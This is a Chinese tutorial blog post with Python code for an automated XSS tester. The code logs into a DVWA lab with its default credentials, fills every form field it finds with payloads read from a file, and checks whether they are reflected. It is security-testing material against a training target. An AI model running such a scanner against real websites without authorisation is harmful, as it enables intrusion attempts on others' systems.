利用Python编写测试目标网页是否存在XSS漏洞的工具
2022/5/2 17:13:08
本文主要是介绍利用Python编写测试目标网页是否存在XSS漏洞的工具,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
以DVWA应用为目标,测试目标URL是否存在XSS漏洞,其基本思想是:
1. 利用session登录DVWA应用
2. 下载目标URL网页,并提取出表单以及input等名称
3. 构造请求,并将XSS测试语句作为表单的提交内容
import requests from lxml import etree import sys class XSSTester: def __init__(self, target_url) -> None: self.banner() self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0', } self.sessions = requests.Session() login_url = 'http://192.168.140.137/dvwa/login.php' credentials_data = { 'username':'admin', 'password':'password', 'Login':'Login' } response = self.sessions.post(url=login_url, headers=self.headers, data=credentials_data).text if "Login failed" not in response: self.target_url = target_url else: print("Failed to authenticate") sys.exit(0) def banner(self): banner = """ ****************************************************************** ****************************************************************** XSS Test Tool by Jason Wong V1.0 ****************************************************************** ****************************************************************** """ print(banner) def xss_check(self, payload): response = self.sessions.get(url=self.target_url, headers=self.headers) html = etree.HTML(response.text) form_list = html.xpath("//form") for form in form_list: method = form.xpath('./@method')[0] action = self.target_url if form.xpath('./@action'): action = form.xpath('./@action')[0] input_list = form.xpath('.//input') dict_data = {} for input in input_list: name = input.xpath('./@name')[0] value = payload type = input.xpath('./@type')[0] if type == 'submit' and input.xpath('./@value'): value = input.xpath('./@value')[0] dict_data[name] = value if form.xpath('.//textarea'): text_area = form.xpath('.//textarea')[0] dict_data[text_area.xpath('./@name')[0]] = 'test data for text area' if method == 'post': response = self.sessions.post(url=action,data=dict_data,headers=self.headers).text if payload in response: print("XSS vulnerability exists on the target URL: tested by payload %s" % payload) sys.exit(0) else: response = self.sessions.get(url=action,params=dict_data, headers=self.headers).text if payload in response: print("XSS vulnerability exists on the target URL: tested by payload %s" % payload) sys.exit(0) def run(self): with open('XssPayloads.txt', 'r') as f: for line in f.readlines(): payload = line.strip() self.xss_check(payload) if __name__ == "__main__": target_url = 'http://192.168.140.137/dvwa/vulnerabilities/xss_s/' xss_tester = XSSTester(target_url=target_url) xss_tester.run()
这篇关于利用Python编写测试目标网页是否存在XSS漏洞的工具的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-21Python编程基础教程
- 2024-11-20Python编程基础与实践
- 2024-11-20Python编程基础与高级应用
- 2024-11-19Python 基础编程教程
- 2024-11-19Python基础入门教程
- 2024-11-17在FastAPI项目中添加一个生产级别的数据库——本地环境搭建指南
- 2024-11-16`PyMuPDF4LLM`:提取PDF数据的神器
- 2024-11-16四种数据科学Web界面框架快速对比:Rio、Reflex、Streamlit和Plotly Dash
- 2024-11-14获取参数学习:Python编程入门教程
- 2024-11-14Python编程基础入门